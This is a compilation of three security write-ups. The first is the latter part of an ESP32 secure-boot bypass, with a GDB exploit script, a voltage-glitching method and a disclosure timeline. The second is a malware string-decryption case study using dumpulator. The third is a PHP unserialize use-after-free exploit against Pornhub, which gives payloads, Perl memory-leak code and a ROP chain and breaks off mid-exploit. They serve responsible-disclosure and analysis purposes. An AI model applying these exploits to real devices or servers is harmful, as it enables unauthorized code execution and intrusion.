For an attacker, it is obviously more interesting to focus on the Bootloader verification done by the BootROM (not on the further stages).

The Software Setup

Compile and run a signed Application

A simple main.c like that should be enough as a test application:

void app_main()
 {
     while(1)
     {
     printf("Hello from SEC boot K1!\n");
     vTaskDelay(1000 / portTICK_PERIOD_MS);
     }
 }

To compile, I enable the (reflashable) secure boot via make menuconfig. That will automatically compute and insert the digest into the signed bootloader file. This config will generate a known Secure Boot Key. (I can reflash a different signed bootloader in the future). Security stays the same.

make menuconfig

After the end of the compilation, I finally flash the bootloader+digest file at 0x0 in the flash layout, the app image at 0x10000 and the table partition at 0x8000 using esptool.py.

Setting the Secure Boot

I enable the secure boot feature on a new ESP32 board manually, using these commands:

## Burn the secure boot key into BLK2
$ espefuse.py burn_key secure_boot ./hello_world_k1/secure-bootloader-key-256.bin
## Burn the ABS_DONE fuse to activate the sec boot
$ espefuse.py burn_efuse ABS_DONE_0

After the reset, the E-fuses map can be read using espefuse.py tool:

eFuses summary

Secure boot is enabled (ABS_DONE_0=1) and the secure boot key (BLK2) cannot be readout anymore. CONSOLE_DEBUG_DISABLE was already burned when I received the board.

The ESP32 will now authenticate the bootloader after each reset, the software then verifies the app and the code is running:

...
I (487) cpu_start: Pro cpu start user code                                      
I (169) cpu_start: Starting scheduler on PRO CPU.                               
Hello from SEC boot K1!
Hello from SEC boot K1!
Hello from SEC boot K1!
...

Note: Some advised people will probably notice I do not burn the JTAG_DISABLE eFuse…intentionally 😉

Compile and run the unsigned Application

To set my attack scenario, I create a new project with this straightforward hello_world C code in the main function:

void app_main()
 {
     while(1)
     {
     printf("Sec boot pwned by LimitedResults!\n");
     vTaskDelay(1000 / portTICK_PERIOD_MS);
     }
 }

I compile then I flash the unsigned bootloader and the unsigned app image. As expected, the device is bricked displaying an error message on the UART:

ets Jun  8 2016 00:22:57
rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
 configsip: 0, SPIWP:0xee
 clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
 mode:DIO, clock div:2
 load:0x3fff0018,len:4
 load:0x3fff001c,len:8708
 load:0x40078000,len:17352
 load:0x40080400,len:6680
 secure boot check fail
 ets_main.c 371
...(infinite loop)

Exactly what I wanted. The secure boot fails once it checks the unsigned bootloader. 

The attack is simple here. The goal is to find a way to force the ESP32 to execute this unsigned bootloader (then my unsigned app) on the ESP32.
Let’s reverse now.

The JTAG way

You remember I did not burn the JTAG fuse? It is great because I can now use this debug interface to identify the secure boot related functions and see how I can prepare an exploit.

OpenOCD + FT2232h board 

I download openOCD for ESP32 here and extract it:

$ wget https://github.com/espressif/openocd-esp32/releases/download/v0.10.0-esp32-20190313/openocd-esp32-linux64-0.10.0-esp32-20190313.tar.gz
$ tar -xvf openocd-esp32-linux64-0.10.0-esp32-20190313.tar.gz
$ cd openocd-esp32

Full Debug Setup

I need an interface to connect via JTAG to the ESP32. The FT2232h board is perfect, it’s my Swiss army knife. The connections between the two boards are below:

FT2232H_ADBUS1_TDI <-> GPIO12 (MTDI)
FT2232H_ADBUS0_TCK <-> GPIO13 (MTCK)
FT2232H_ADBUS3_TMS <-> GPIO14 (MTMS)
FT2232H_ADBUS2_TDO <-> GPIO15 (MTDO)
FT2232H_GND        <-> ESP32_GND

JTAG setup. ESP32 on the left, FT2232h board on the right.

GDB session

Then, openOCD and GDB are launched in two distinctive shells:

# shell 1
$ ./bin/openocd -s share/openocd/scripts -f interface/ftdi/ft2232h_bb.cfg -f board/esp-wroom-32.cfg -c "init; reset halt"
# shell 2
$ xtensa-esp32-elf-gdb

I also add a minicom shell to UART0. At the end, it’s just a normal GDB debug session:

A shell for UART, a shell for GDB, a shell for openOCD and my custom config for the ft2232h breakout board

After reset, the Program Counter (PC) is directly landing at 0x40000400 aka the reset vector address, CPU is halted, and I have full control of the BootROM code flow.

Digging into the BootROM

The Dump

I dump the BootROM through the JTAG interface.

The Reverse

Note: I don’t detail the entire reverse here because it would take too long.

I am not the first working on this this ESP32 bootROM. This guys here and here did awesome jobs.

I became a little bit more familiar with Xtensa ISA since last year. Using IDA and a good plug-in from here, I was able to figure out.

The ISA reference manual is available here.

Digging into the Xtensa BootROM code, I finally identified a bnei instruction (0x400075B7) after ets_secure_boot_check_finish:

ecure boot final check BNEI (branch instruction validating or not the signed image).

The PC has to reach 0x400075C5 (right side) after the branch instruction (bnei) to validate the unsigned bootloader.
Let’s use and GDB over JTAG to confirm it.

Exploit validation (via GDB)

As seen above, patching the value inside the register a10 should be enough to reach 0x400075C5. Here is the GDB script example able to bypass the secure boot check, to finally execute my own image :

target remote localhost:3333
monitor reset halt
hb *0x400075B7
continue
set $a10 = 0
continue

Then:

$ xtensa-esp32-elf-gdb -x exploit.gdb

PoC video

Let’s set to 0 the a10 register to bypass the secure boot (via JTAG access).

Of course, other patching exploits are possible…But now, I just need to reproduce that, without using JTAG 🙂

Time to Pwn (for Real)

To reproduce this exploit, I can only use fault injection because it’s the only way to interact with the ESP32 bootROM code (no control otherwise).

The target

The LOLIN board will be used for the PoC:

LOLIN dev-kit (10$ on Amazon)

I configure the second board to enable the secure boot. Here is the device’s eFuses:

eFuses Security configuration of the device under test. Secure boot enabled, JTAG disabled, Console debug disabled.

Power domains (Round 2)

During my post on ‘DFA warm-up’ here, I already modified VDD_CPU line to attach directly the output of the glitcher to the VDD_CPU pin.

Surprisingly, during my first tests, glitching the VDD_CPU did not affect so much the normal behaviour of the chip during the bootROM process. 

I have to find a solution. After probing some lines, I am suspecting the VDD_RTC plays a important role during the bootROM process.

Consequently, I decide to double glitch on the VDD_CPU and VDD_RTC simultaneously, to provide maximum voltage drop-out during the bootROM execution.

I cut the VDD_RTC line and I solder a second magnet wire to the VDD_RTC pin. The final PCB looks like that:

Glitch on VDD_CPU and VDD_RTC simultaneously. SMD grabber on MOSI pin.

The SMD grabber is connected to the MOSI. I will be able to see the activity on the SPI bus between the SPI, storing the bootloader image, and the ESP32, which will authenticate and run the image). 

This MOSI signal gives a nice timing information (see CH2 on scope screens below).

Hardware Setup

I use python to script and synchronise all the equipments:

Final setup to pwn the ESP32 secure boot.

It is time to obtain results, I would say.

Fault session

ESP32 Stuck in a loop

As already explained, the ESP32 automatically reset after each secure boot check:

ets Jun  8 2016 00:22:57                                                        
 rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)                     
 configsip: 0, SPIWP:0xee                                                        
 clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00         
 mode:DIO, clock div:2                                                           
 load:0x3fff0018,len:4                                                           
 load:0x3fff001c,len:8556                                                        
 load:0x40078000,len:12064                                                       
 load:0x40080400,len:7088                                                        
 secure boot check fail                                                          
 ets_main.c 371                                                                  
 ets Jun  8 2016 00:22:57
...(infinite loop)     

Timing Fault

Here is a scope capture:

Secure boot check fail. CH1= UART TX; CH2=SPI MOSI

The signature verification is obviously achieved between the last SPI data frames and the UART error message ‘secure boot check fail’ (RS232-TX). 

Glitch effect is visible on the UART line (CH1).

According to what I saw during the BootROM reverse, the ets_secure_boot_check_finish is a tiny function and I am pretty sure about its timing location. It is why I am starting to glitch near to the end of the SPI flash MOSI data (CH2).

Fault injections is like fishing. When you are sure you are in a good spot with the good rods and fresh baits, you just have to wait. It is just a matter of time to obtain the good behavior:

Entry Point 0x400807a0 => Secure boot bypassed.
Cheers!

Note: Glitch Timing is really dependent of the setup.

Once the glitch is successful, the CPU is jumping to the entry point (see entry 0x400807a0 on scope) and the unsigned bootloader previously loaded in SRAM0 is then executed. Secure boot is bypassed and the attack is effective until the next reset. 

Here is the UART log when the attack is successful:

st:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)                     
 configsip: 0, SPIWP:0xee                                                        
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00         
 mode:DIO, clock div:2                                                           
 load:0x3fff0018,len:4                                                           
 load:0x3fff001c,len:8556                                                        
 load:0x40078000,len:12064                                                       
 load:0x40080400,len:7088                                                        
 entry 0x400807a0                                                                
 D (88) bootloader_flash: mmu set block paddr=0x00000000 (was 0xffffffff)        
 I (38) boot: ESP-IDF v4.0-dev-667-gda13efc-dirty 2nd stage bootloader           
...
...
...
 I (487) cpu_start: Pro cpu start user code                                      
 I (169) cpu_start: Starting scheduler on PRO CPU.                               
 Sec boot pwned by LimitedResults!                                               
 Sec boot pwned by LimitedResults!                                               
 Sec boot pwned by LimitedResults!                                               
...(infinite loop)   

Original PoC video

Sorry for the tilt:

Original PoC

Conclusion

A complete exploit on the ESP32 secure boot using voltage glitching technique has been presented.
First, BootROM was reversed to find the function in charge to verify the bootloader signature. Then, an exploit was prepared using patching function over JTAG on a first ESP32 board. Finally, the exploit was reproduced on a second ESP32 board, using voltage fault injection to disrupt the BootROM process, to finally execute unsigned firmware on ESP32.

All the ESP32 already shipped (with only secure boot enabled) are vulnerable. 

Due to the low-complexity of the attack, it can be reproduced on the field easily, (less than one day and using less than 1000$ equipment).

This vulnerability cannot be fixed without Hardware Revision. Espressif has already shipped dozens of Millions of devices.

The only way to mitigate is certainly to use Secure Boot + Flash Encryption configuration. But maybe not after all, teaser here.

Stay tuned for the final act!

Timeline Disclosure

04/06/2019: Email sent to Espressif with the PoC video.

05/06/2019: Espressif team is asking for more details. 

01/08/2019: Light report on Secure Boot + PoC sent to Espressif. Espressif announces a second team has also reported something very similar (they did not want to disclose details about this team). Espressif proposes to go for CVE.

12/08/2019: Espressif is OK for 30-days disclosure process. Espressif announces they may decide to not register CVE.

30/08/2019: Espressif announces CVE is on going.

01/09/2019: Posted.

UPDATE

02/09/2019: Security advisory from Espressif released here.

05/09/2019: Espressif provides Common Vulnerabilities and Exposures number CVE-2019-15894. Link here.

[Case study] Decrypt strings using Dumpulator

[Case study] Decrypt strings using Dumpulator

Original text by m4n0w4r

1. References
2. Code analysis

I received a suspicious Dll that needs to be analyzed. This Dll is packed. After unpacking it and throwing the Dll into IDA, IDA successfully analyzed it with over 7000 functions (including API/library function calls). Upon quickly examining at the Strings tab, I came across numerous strings in the following format:

Based on the information provided, I believe these strings have definitely been encrypted. Going through the code snippet using an arbitrary string, I found the corresponding assembly code and pseudocode as follows (function and variable names have been changed accordingly):

With the image above, it is easy to see:

  • The 
    <mark><strong>EAX</strong>&nbsp;</mark>
    register will hold the address of the encrypted string.
  • The 
    <mark><strong>EDX</strong>&nbsp;</mark>
    register will hold the address of the string after decryption.
  • The 
    <mark><strong>mw_decrypt_str_wrap</strong>&nbsp;</mark>
    function performs the task of decrypting the string.

Here, if any of you have the same idea of analyzing the 

<mark><strong>mw_decrypt_str_wrap</strong> </mark>
function to rewrite the IDApython code for decryption, congratulations to you 🙂 You share the same thought as me! The 
<mark><strong>mw_decrypt_str_wrap</strong> </mark>
function will call the 
<mark><strong>mw_decrypt_str</strong> </mark>
function.

After going around various functions and thinking about how to code, I started feeling increasingly discouraged. Moreover, when examining the cross-references to the 

<mark>mw_decrypt_str_wrap </mark>
function, I noticed that it was called over 4000 times to decrypt strings… WTF 😐

3. Use dumpulator

As shown in the above image, there are too many function calls to the decryption function. Moreover, rewriting this decryption function would be time-consuming and require code debugging for verification. I think I need to find a way to emulate this function to perform the decryption step and retrieve the decrypted string. Several solutions came to mind, and I also asked my brother, who suggested using x or y solutions. After some trial and error, I decided to try using dumpulator. To be able to use dumpulator, we first need to create a minidump file of this DLL (dump when halted at DllEntryPoint). After obtaining the dump file, I tested the following code snippet:

from dumpulator import Dumpulator
 
dec_str_fn = 0x02FE08C0
enc_str_offset = 0x02FD9988
 
dp = Dumpulator("mal_dll.dmp", quiet=True)
tmp_addr = dp.allocate(256)
dp.call(dec_str_fn, [], regs={'eax':enc_str_offset , 'edx': tmp_addr})
dec_str = dp.read_str(dp.read_long(tmp_addr))
print(f"Encrypted string: '{dp.read_str(enc_str_offset)}'")
print(f"Decrypted string: '{dec_str}'")

Result when executing the above code:

0ly Sh1T… 😂 that’s exactly what I wanted.

Next, I will rewrite the code according to my intention as follows:

  • Use regex to search for patterns and extract all encoded string addresses.
  • Filter out addresses that match the pattern but are not decryption functions or undefined addresses and add them to the 
    <mark>BLACK_LIST</mark>
    .

Here’s a lame code snippet that meets my needs:

import re
import struct
import pefile
from dumpulator import Dumpulator
 
dump_image_base = 0x2F80000
dec_str_fn = 0x02FE08C0
 
BLACK_LIST = [0x3027520, 0x30380b6, 0x30380d0, 0x3039a08, 0x3039169, 0x303a6b6, 0x303aa0e, 0x303ab5c, 0x303bbf3, 0x3066075, 0x306661b, 0x3083e50,
              0x3084373, 0x30856d1, 0x30858aa, 0x308c7ac, 0x308d02d, 0x30acbfd, 0x30cd12e, 0x30cd187, 0x30cd670, 0x30cd6d4, 0x30cfe2f, 0x30d4cc4,
              0x3106da0]
 
FILE_PATH = 'dumped_dll.dll'
dp = Dumpulator("mal_dll.dmp", quiet=True)
 
file_data = open(FILE_PATH, 'rb').read()
pe = pefile.PE(data=file_data)
 
egg = rb'\x8D\x55.\xB8(....)\xE8....\x8b.'
tmp_addr = dp.allocate(256)
 
def decrypt_str(xref_addr, enc_str_offset):    
    print(f"Processing xref address at: {hex(xref_addr)}")
    print(f"Encryped string offset: {hex(enc_str_offset)}")
    dp.call(dec_str_fn, [], regs={'eax': enc_str_offset, 'edx': tmp_addr})
    dec_str = dp.read_str(dp.read_long(tmp_addr))
    print(f"{hex(xref_addr)}: {dec_str}\n")
    return dec_str
     
for m in re.finditer(egg, file_data):
    enc_str_offset = struct.unpack('<I', m.group(1))[0]
    inst_offset = m.start() 
    enc_str_offset_in_dmp = enc_str_offset - 0x400000 + dump_image_base
    call_fn_addr = inst_offset + 8 - 0x400 + dump_image_base + 0x1000
    if call_fn_addr not in BLACK_LIST:
        str_ret =  decrypt_str(call_fn_addr, enc_str_offset_in_dmp)
 
print(f"H0lY SH1T... IT's D0NE!!!")

Result when executing the above script:

No errors whatsoever 😈!!! As a final step, I added a code snippet to this script that will output a Python file. This file will contain the 

<mark><strong>idc.set_cmt</strong>&nbsp;</mark>
commands to set comment for the decrypted strings above at the address where the decrypt function is called. 

The final result is as follows:

End.

m4n0w4r

How we broke PHP, hacked Pornhub and earned $20,000

How we broke PHP, hacked Pornhub and earned $20,000

Original text by Ruslan Habalov

It all started by auditing Pornhub, then PHP and ended in breaking both…

tl;dr:

  • We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone.
  • We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm.
  • Those vulnerabilities were remotely exploitable over PHP’s unserialize function.
  • We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone).

Credits:

This project was realized by Dario Weißer (@haxonaut), cutz and Ruslan Habalov (@evonide).
Many thanks go out to cutz for co-authoring this article.

Pornhub’s bug bounty program and its relatively high rewards on Hackerone caught our attention. That’s why we have taken the perspective of an advanced attacker with the full intent to get as deep as possible into the system, focusing on one main goal: gaining remote code execution capabilities. Thus, we left no stone unturned and attacked what Pornhub is built upon: PHP.

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

  • http://www.pornhub.com/album_upload/create
  • http://www.pornhub.com/uploading/photo

In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

http://www.pornhub.com/album_upload/create
http://www.pornhub.com/uploading/photo
In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

This could be further verified by sending a specially crafted array that contained an object:

tags=xyz&title=xyz...&cookie=a:1:{i:0;O:9:"Exception":0:{}}

Response layout:

0=exception 'Exception' in /path/to/a/file.php:1337
 Stack trace:
 #0 /path/to/a/file.php(1337): unserialize('a:1:{i:0;O:9:"E...')
 #1 {main}

This might strike as a harmless information disclosure at first sight, but generally it is known that using user input on unserialize is a bad idea:

Standard exploitation techniques require so called Property-Oriented-Programming (POP) that involve abusing already existing classes with specifically defined “magic methods” in order to trigger unwanted and malicious code paths. Unfortunately, it was difficult for us to gather any information about Pornhub’s used frameworks and PHP objects in general. Multiple classes from common frameworks have been tested — all without success.

Bug description

The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past (e.g. phpcodz). Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?

Fuzzing unserialize

To find an answer Dario implemented a fuzzer crafted specifically for fuzzing serialized strings which were passed to unserialize. Running the fuzzer with PHP 7 immediately lead to unexpected behavior. This behavior was not reproducible when tested against Pornhub’s server though. Thus, we assumed a PHP 5 version.

However, running the fuzzer against a newer version of PHP 5 just generated more than 1 TB of logs without any success. Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again. Several questions had to be answered: is the issue security related? If so can we only exploit it locally or also remotely? To further complicate this situation the fuzzer did generate non-printable data blobs with sizes of more than 200 KB.

Analyzing unexpected behavior

A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.

Vulnerability links:

The high sophistication of the found PHP bugs and their discovery made it necessary to write separate articles. You can read more details in Dario’s fuzzing unserialize write-up.

In addition, we have written an article about Breaking PHP’s Garbage Collection and Unserialize.

Exploitation

Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.
Since our main goal was to execute arbitrary code we needed to somehow compromise the CPU’s instruction pointer referred to as RIP on x86_64. This usually involves the following obstacles:

  1. The stack and heap (which also include any potential user-input) as well as any other writable segments are flagged non-executable (c.f. Executable space protection).
  2. Even if you are able to control the instruction pointer you need to know what you want to execute i.e. you need to have a valid address of an executable memory segment. For this it is common to call the libc function system which will execute a shell command. In PHP context it is often enough to execute zend_eval_string which usually gets executed e.g. when you write “eval(‘echo 1337;’);” in a PHP script i.e. it allows us to execute arbitrary PHP code without having to transition into other involved libraries.

The first problem can be overcome by using Return-oriented programming (ROP) where you can utilize already existing and executable memory fragments from the binary itself or its libraries. The second problem, however, requires to find the correct address of zend_eval_string. Usually, when a dynamically linked program gets executed the loader will map the process to 0x400000 which is the standard load address on x86_64. In case you somehow already obtained the correct PHP executable (e.g. by finding the exact package that is shipped by the target) you can just locally lookup the offset for any function you wantWe discovered that Pornhub was using a customly compiled version of php5-cgi, therefore making it difficult to determine the exact PHP version as well as getting any information at all about the memory layout of the whole PHP process.

Leaking the PHP binary and required pointers

Exploiting use-after-frees in PHP usually follows the same rules. As soon as you’re able to fill freed memory that later on gets reused as an internal PHP variable — so called zvals — you can generate vectors that allow reading from arbitrary memory as well as triggering code execution.

Preparing the memory disclosure

As previously mentioned we were required to obtain more information about Pornhub’s PHP binary. Therefore, the first step was to abuse the use-after-free to inject a zval that represents a PHP string. The definition of the zval structure looks like the following for PHP 5.6:

"Zend/zend.h"
[...]
struct _zval_struct {
    zvalue_value value;       /* value */
    zend_uint refcount__gc;
    zend_uchar type;          /* active type */
    zend_uchar is_ref__gc;
};

Whereas the zvalue_value field is defined as a union, hence making type juggling (and type confusions) easily possible.

"Zend/zend.h"
[...]
typedef union _zvalue_value {
    long lval;          /* long value */
    double dval;        /* double value */
    struct {
        char *val;
        int len;
    } str;
    HashTable *ht;      /* hash table value */
    zend_object_value obj;
    zend_ast *ast;
} 

A PHP variable of type string is a zval of type 6. Consequently, it treats the union as a structure that contains a char pointer and a length field. So crafting a string zval with an arbitrary starting point and arbitrary length creates a powerful infoleak that gets triggered when Pornhub’s setcookie() reflects the injected zval in the response header.

Finding PHP’s image base

Usually, one can start by leaking the binary, which as stated before, begins at 0x400000. Unfortunately, Pornhub’s server used protection mechanisms like PIE and ASLR which randomize the image base of the process and its shared libraries. This also has become the default as more and more distributions ship packages that enable position independent code.

The next challenge was on: finding the correct loading address of the binary.

The first difficulty was to somehow obtain a single valid address we could start leaking from. Here it was helpful to know some details about PHP’s internal memory management. In particular, once a zval is freed PHP will overwrite its first eight bytes with an address to the previously freed chunk. Hence, a trick to obtain a first valid address is to create an integer zval, free this integer zval and finally use a dangling pointer to this zval to obtain its current value.

Since php-cgi implements multiple workers that simply get forked from a master process, the memory layout never really changes between different requests, as long as you keep sending data of the same size. That’s also why we could send request after request, each time leaking a different portion of memory by letting the fake zval string begin at different addresses. However, obtaining the heap address of a freed chunk is by its own right not enough to get any clues about the executable location. This is due to a lack of any useful information in the surroundings of that chunk.

To get interesting addresses, there is a relatively complicated technique which requires multiple frees and allocations of PHP structures during the unserialization process (c.f. ROP in PHP applications Slide 67). Due to the nature of our bug and to keep the complexity as low as possible we have used our own trick.

By using a serialized string like “i:0;a:0:{}i:0;a:0:{}[…]i:0;a:0:{}” as part of our overall unserialize payload we could force unserialize to create many empty arrays and free them once it terminated. When initializing an array PHP consecutively allocates memory for its zval and hashtable. One default hashtable entry for empty arrays is the uninitialized_bucket symbol. Overall, we were able to obtain a memory fragment that looked similar to the following:

0x7ffff7fc2fe0: 0x0000000000000000 0x0000000000eae040
[...]
0x7ffff7fc3010: 0x00007ffff7fc2b40 0x0000000000000000
0x7ffff7fc3020: 0x0000000100000000 0x0000000000000000
0x7ffff7fc3030: # <--------- This address was leaked in a previous request.
0x7ffff7fc3040: 0x00007ffff7fc2f48 0x0000000000000000
0x7ffff7fc3050: 0x0000000000000000 0x0000000000000000
[...]
0x7ffff7fc30a0: 0x0000000000eae040 0x00000000006d5820
(gdb) x/xg 0x0000000000eae040
0xeae040 <uninitialized_bucket>: 0x0000000000000000

The address 0xeae040 is PHP’s uninitialized_bucket symbol address and directly points into PHP’s BSS segment. You can see that it occurs multiple times in the neighborhood of the lastly freed chunk. As stated before, many empty arrays were freed. Thus, by abusing the circumstance that some hashtable entries remained unchanged in the heap we were able to leak this specific symbol.

Finally, we could apply a page-wise backwards scan starting from the uninitialized_bucket symbol address to find the ELF header:

$start &= 0xfffffffffffff000;
$pages += 0x1000 while leak($start - $pages, 4) !~ /^\x7fELF/;
return $start - $pages;
Leaking interesting PHP binary segments

At this point our situation further complicated things as we were only able to leak 1 KB of data per request (this is due to enforced header size limitations by Pornhub’s web server). A PHP binary can take up to about 30 MB of size. Assuming one request per second the leaking would have taken about 8 hours and 20 minutes to complete. As we were afraid that our exploitation process could get interrupted at any time it was essential to act as fast and as stealthy as possible. This is why we were required to implement some heuristics to guess/filter likely interesting sections in advance. Nevertheless, we could resolve any structure that was referenced in the ELF’s string and symbol table. There are other techniques like ret2dlresolve that allow omitting the whole leaking process, but they weren’t entirely applicable here since they require crafting more data structures and require knowledge about different memory locations.

To get the address of zend_eval_string you’d first have to find the ELF program headers which are at offset 32, then scan forward until you find a program header entry of type 2 (PT_DYNAMIC) to get the ELF’s dynamic section. This section finally contains a reference to the string and symbol table (type 5 and 6) which you can completely dump by using their size fields and grab any function whose virtual address you desire. Alternatively, you can also use the hashtable (DT_HASH) to find functions more quickly, but in this scenario it doesn’t matter much since you can quickly traverse the tables locally anyway. In addition to zend_eval_stringwe were interested in further symbols and the location of our POST variables (because they were supposed to be used as a ROP stack later on).

Leaking the address of our POST data

To get the address of the supplied POST data you can just leak some more pointers by reading from:

(*(*(php_stream_temp_data *)(sapi_globals.request_info.request_body.abstract)).innerstream).readbuf

Traversing this chain looks complicated, but you just need to dereference a few pointers with the correct offset and you’ll quickly find the stdin:// stream which points to the POST data inside the heap.

Preparing the ROP payload

The second part deals with actually taking control over the PHP process and gaining code execution. For this to happen we need to discuss how one can modify the instruction pointer first.

Taking over the instruction pointer

We adjusted our payload to contain a fake object (instead of the previously used string zval) with a pointer to a specially crafted zend_object_handlers table. This table is, in its essence, an array of function pointers whose structure definition can be found in:

"Zend/zend_object_handlers.h"
[...]
struct _zend_object_handlers {
    zend_object_add_ref_t add_ref;
[...]
};

When creating such a faked zend_object_handlers table we can simply setup add_ref however we prefer. The function behind this pointer usually handles the incrementation of the object’s reference counter. Once our created fake object gets passed as a parameter to “setcookie” the following things happen:

#0  _zval_copy_ctor
#1  0x0000000000881d01 in parse_arg_object_to_string
[...]
#5  0x00000000008845ca in zend_parse_parameters (num_args=2, type_spec=0xd24e46 "s|slssbb")
#6  0x0000000000748ad5 in zif_setcookie
[...]
#14 0x000000000093e492 in main

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

In particular, this will make a call to the provided add_ref function with the address of our object as a parameter (c.f. PHP Internals Book – Copying zvals to see an explanation). The corresponding assembly looks like:

<_zval_copy_ctor_func+288>: mov    0x8(%rdi),%rax
<_zval_copy_ctor_func+292>: callq  *(%rax)

Here, RDI is the first argument to the _zval_copy_ctor_func  function which also is the address of our fake object zval (zvalue in the source code above). As previously seen in the definition of the  _zvalue_valuetypedef, an object contains an element called obj of type zend_object_value which is defined as follows:

"Zend/zend_types.h"
[...]
typedef struct _zend_object_value {
    zend_object_handle handle;
    const zend_object_handlers *handlers;
} zend_object_value;

Thus, 0x8(%rdi) will point to the second entry in  _zend_object_value which corresponds to the address of our first zend_object_handlers entry. As mentioned before, this entry is our custom add_ref function and explains why we have direct control over RAX, too.

To bypass the previously discussed non-executable memory problem we had to obtain further information. In particular, we needed to collect useful gadgets and prepare stack pivoting for our ROP chain since there wasn’t enough control over the stack yet.

Leaking ROP gadgets

Now we could setup the add_ref pointer, or RAX respectively, to take over the instruction pointer. Although this gives you a starting point it doesn’t ensure that all of your provided ROP gadgets are executed because the CPU will pop the next instruction’s address from the current stack once returning from the first gadget. We don’t have any control over this stack, so consequently, it was necessary to pivot the stack into our ROP chain. This is why the next step was to copy RAX into RSP and continue ropping from there. Using a locally compiled version of PHP we scanned for good candidates for stack pivoting gadgets and found that php_stream_bucket_split contained the following piece of code:

<php_stream_bucket_split+381>: push %rax    # <------------
<php_stream_bucket_split+382>: sub $0x31,%al
<php_stream_bucket_split+384>: rcrb $0x41,0x5d(%rbx)
<php_stream_bucket_split+388>: pop %rsp     # <------------
<php_stream_bucket_split+389>: pop %r13
<php_stream_bucket_split+391>: pop %r14
<php_stream_bucket_split+393>: retq

This was used to nicely modify RSP to point to our by POST data provided ROP chain, effectively chaining all provided gadget calls.

According to the x86_64 calling convention the first two parameters of a function are RDI and RSI, so we had to find a pop %rdi and pop %rsi gadget, tooThose are pretty common and thus easily found. However, we still had no idea if those gadgets actually existed on Pornhub’s version of PHP. Therefore, we had to manually verify their presence.

Verifying the presence of the required ROP gadgets

The infoleak vector allowed us to quickly dump the disassembly of php_stream_bucket_split and check if our stack pivoting gadget was available on the remote version. Fortunately, only little corrections of the gadgets’ offsets were necessary. Finally, we implemented some checks to confirm that all addresses were correct:

my $pivot  = leak($php_base + 0x51a71f, 13);
my $poprdi = leak($php_base + 0x2b904e, 2);
my $poprsi = leak($php_base + 0x50ee0c, 2);
 
die '[!] pivot gadget doesnt seem to be right', $/
    unless ($pivot eq "\x50\x2c\x31\xc0\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\xc3");
 
die '[!] poprdi gadget doesnt seem to be right', $/
    unless ($poprdi eq "\x5f\xc3");
 
die '[!] poprsi gadget doesnt seem to be right', $/
    unless ($poprsi eq "\x5e\xc3");
Crafting the ROP stack

The final ROP payload that effectively executed zend_eval_string(code); exit(0); looked like the following snippet:

my $rop = "";
$rop .= pack('Q', $php_base + 0x51a71f);              # pivot rsp
$rop .= pack('Q', 0xdeadbeef);                        # junk
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', $post_addr + length($rop) + 8 * 7); # pointing to $php_code
$rop .= pack('Q', $php_base + 0x50ee0c);              # pop rsi
$rop .= pack('Q', 0);                                 # retval_ptr
$rop .= pack('Q', $zend_eval_string);                 # zend_eval_string
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', 0);                                 # exit code
$rop .= pack('Q', $exit);                             # exit
$rop .= $php_code . "\x00";

